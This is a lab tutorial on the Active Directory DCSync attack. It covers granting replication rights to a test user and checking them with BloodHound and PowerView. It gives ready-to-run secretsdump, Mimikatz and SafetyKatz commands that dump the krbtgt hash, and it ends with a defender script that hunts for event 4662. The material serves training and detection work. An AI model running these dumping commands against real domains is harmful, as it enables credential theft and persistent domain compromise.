8.7.2 - DCSync Attack

DCSync Attack

DCSync is a post-exploitation technique that extracts credential material from an AD domain by abusing the directory replication feature, the mechanism Domain Controllers use to synchronize data among themselves.

The attack tricks a DC into believing the attacker is another legitimate DC that needs replication data: the attacker calls the DRSUAPI GetNCChanges RPC with an account that holds the replication extended rights on the domain object, and the DC hands back the requested objects, secrets included. Nothing runs on the DC itself.

The replication data extracted with this attack includes:

  • NTLM password hashes (including the krbtgt one)

  • Kerberos keys (AES128/AES256)

  • Password history

DCSync can therefore be combined with other attacks, such as the Golden Ticket attack (which needs the krbtgt hash), to establish persistence in a domain.

Configuration of a vulnerable user

Log on to the Domain Controller with an administrative account:

  • Open Active Directory Users and Computers

  • Right-click the domain node dev-angelist.lab -> Properties -> Security -> Add (devan), Check Names, OK

Select the devan user and tick Allow on these three permissions:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes In Filtered Set

and confirm. Only the first two (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) are actually required for DCSync; the third covers attributes in the filtered set and is not needed to pull password hashes.

Alternatively, the same ACEs can be set with the Set-ADACL function from RACE.ps1 (the rights live on the domain object, which is why the target is the domain DN):

Import-Module .\RACE.ps1

Set-ADACL -SamAccountName devan `
-GUIDRight DCSync `
-DistinguishedName 'DC=dev-angelist,DC=lab' `
-Verbose
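The same change done with the built-in ActiveDirectory (RSAT) module instead of RACE.ps1, as an added example that is not from the original notes or the RACE toolkit. It assumes you run it as a Domain Admin on a host with the ActiveDirectory module; the user devan and the domain are the ones from this lab. The extended rights are addressed by their rightsGuid values; the third one is included only to match the GUI steps, since DCSync needs just the first two. The last statement reads the ACL back so you can confirm the ACEs landed.

```powershell
# Added example: grant the DCSync replication rights to a user with the built-in
# ActiveDirectory module (not RACE.ps1 / Set-ADACL).
# Assumptions: run as a Domain Admin; RSAT ActiveDirectory module installed; user "devan" exists.
Import-Module ActiveDirectory

$targetUser = 'devan'
$domainDN   = (Get-ADDomain).DistinguishedName        # DC=dev-angelist,DC=lab in this lab
$sid        = (Get-ADUser -Identity $targetUser).SID

# Extended rights are identified by the rightsGuid of their controlAccessRight object.
# Only the first two are needed for DCSync; the third is what the GUI step adds as well.
$replicationRights = [ordered]@{
    'DS-Replication-Get-Changes'                 = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-All'             = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-In-Filtered-Set' = '89e95b76-444d-4c62-991a-0facbeda640c'
}

# The AD: PSDrive exposes the domain head as an object whose ACL Get-Acl / Set-Acl can edit.
$acl = Get-Acl -Path "AD:\$domainDN"
foreach ($entry in $replicationRights.GetEnumerator()) {
    $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $sid,
        [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [Guid]$entry.Value
    )
    $acl.AddAccessRule($rule)
    Write-Host "Granting $($entry.Key) to $targetUser on $domainDN"
}
Set-Acl -Path "AD:\$domainDN" -AclObject $acl

# Verify: list the extended-right ACEs on the domain head granted to the user,
# translating the ObjectType GUID back to the right's name.
$byGuid = @{}
foreach ($entry in $replicationRights.GetEnumerator()) { $byGuid[$entry.Value] = $entry.Key }
(Get-Acl -Path "AD:\$domainDN").Access |
    Where-Object { $_.IdentityReference -like "*\$targetUser" -and $_.ActiveDirectoryRights -eq 'ExtendedRight' } |
    Select-Object IdentityReference, AccessControlType,
        @{ Name = 'Right'; Expression = { $byGuid["$($_.ObjectType)"] } }
```

The verification at the end is also the quickest way to audit a domain for this misconfiguration: drop the IdentityReference filter and look at every principal that holds DS-Replication-Get-Changes-All on the domain head; anything that is not a DC computer account (or a known product such as Azure AD Connect's sync account) deserves a question.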

Check if a machine is vulnerable to DCSync attack

We can verify that the rights are in place with BloodHound. Collect the data from the attacker machine with bloodhound-python:

python3 -m venv venv
. venv/bin/activate
pip3 install bloodhound

bloodhound-python -u administrator -p 'P@$$W0rd' -ns 192.168.57.9 -d dev-angelist.lab -c All --zip

Then upload the resulting zip into BloodHound, either a legacy BloodHound/neo4j install or BloodHound CE deployed with the bloodhound-cli tool:

wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
./bloodhound-cli containers start
#Access the BloodHound UI at: http://127.0.0.1:8080/ui/login
#Go to File Ingest and upload the zip file generated by bloodhound-python
#Then check: Dangerous Privileges -> Principals with DCSync privileges

If devan appears in that list, the DCSync attack will work. BloodHound draws the DCSync edge when an account holds both GetChanges and GetChangesAll on the domain object; AllExtendedRights or GenericAll on the domain object implies those rights as well, so either of them alone is enough.

Alternatively, from a domain-joined host (for example logged in as devan) we can use PowerView. The ACL to inspect is the one on the domain object, not on the devan user object; with -ResolveGUIDs the replication rights show up as ExtendedRight with the resolved name in ObjectType (ObjectAceType in the newer PowerView dev branch):

Get-ObjectAcl -DistinguishedName 'DC=dev-angelist,DC=lab' -ResolveGUIDs | ?{ ($_.IdentityReference -match 'devan') -and (($_.ObjectType -match 'Replication') -or ($_.ObjectAceType -match 'Replication') -or ($_.ActiveDirectoryRights -match 'GenericAll')) }

From the attacker machine (Linux/Kali) the check is simply to try the attack: Impacket's secretsdump uses DRSUAPI replication by default when pointed at a DC, so with the replication rights it dumps the hashes and without them it fails with an access-denied error. Include the domain in the target and limit the dump to krbtgt to keep it quiet:

secretsdump.py 'dev-angelist.lab/devan:new_password123'@192.168.57.9 -just-dc-user krbtgt

Mimikatz

Assume we have low-privileged access to a workstation joined to the domain; here we are logged in as dev-angelist\devan. Local administrator rights are not needed: DCSync only requires the replication rights on the domain object, and nothing is executed on the DC.

Download and extract Mimikatz:

iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#use the x64 folder on 64-bit hosts; Win32 here because this machine is 32-bit

and run it to dump the NTLM hash (and Kerberos keys) of the krbtgt account:

.\mimikatz.exe "lsadump::dcsync /domain:dev-angelist.lab /user:krbtgt" "exit"

Using SafetyKatz

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"
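As the defender-side check of the attack above, here is a hunt for DCSync in a DC's Security log, added here as an example that is not part of the original notes. Event 4662 records the replication extended rights (by GUID, in its Properties field) when Directory Service Access auditing is enabled and the domain object's SACL audits those rights, so without that audit policy the script returns nothing; it assumes it runs on a DC with rights to read the Security log and the ActiveDirectory module available. Legitimate replication comes from DC computer accounts, so those are whitelisted; any other principal, including a workstation's computer account, requesting GetChanges/GetChangesAll is reported.

```powershell
# Added example: hunt for DCSync in a domain controller's Security log.
# Assumptions: run on the DC with rights to read the Security log; "Audit Directory Service
# Access" is enabled and the domain object's SACL audits the replication extended rights,
# otherwise no 4662 events are written for them.
Import-Module ActiveDirectory

# Same GUIDs as in the attack; 4662 lists the requested rights in its Properties field in {...} form.
$replicationGuids = @{
    '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}' = 'DS-Replication-Get-Changes'
    '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' = 'DS-Replication-Get-Changes-All'
    '{89e95b76-444d-4c62-991a-0facbeda640c}' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Replication by DC computer accounts (e.g. DC01$) is normal; whitelist exactly those names.
$dcAccounts = (Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" }

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddDays(-1) } -ErrorAction SilentlyContinue

$events | ForEach-Object {
    # Pull the EventData fields (SubjectUserName, Properties, ObjectName, ...) out of the event XML.
    $xml  = [xml]$_.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    $requested = $replicationGuids.Keys | Where-Object { $data['Properties'] -like "*$_*" }
    if (-not $requested) { return }                                   # not a replication request
    if ($dcAccounts -contains $data['SubjectUserName']) { return }    # a real DC replicating

    [pscustomobject]@{
        Time    = $_.TimeCreated
        Account = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        Rights  = ($requested | ForEach-Object { $replicationGuids[$_] }) -join ', '
        Object  = $data['ObjectName']
    }
} | Sort-Object Time | Format-Table -AutoSize
```

A devan DCSync as performed above shows up as a single row with the user account and DS-Replication-Get-Changes-All among the rights. Expect a few legitimate non-DC hits in real environments (Azure AD Connect's sync account, some backup and identity products); those should be a short, known list, and anything outside it is worth treating as an incident.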

Labs
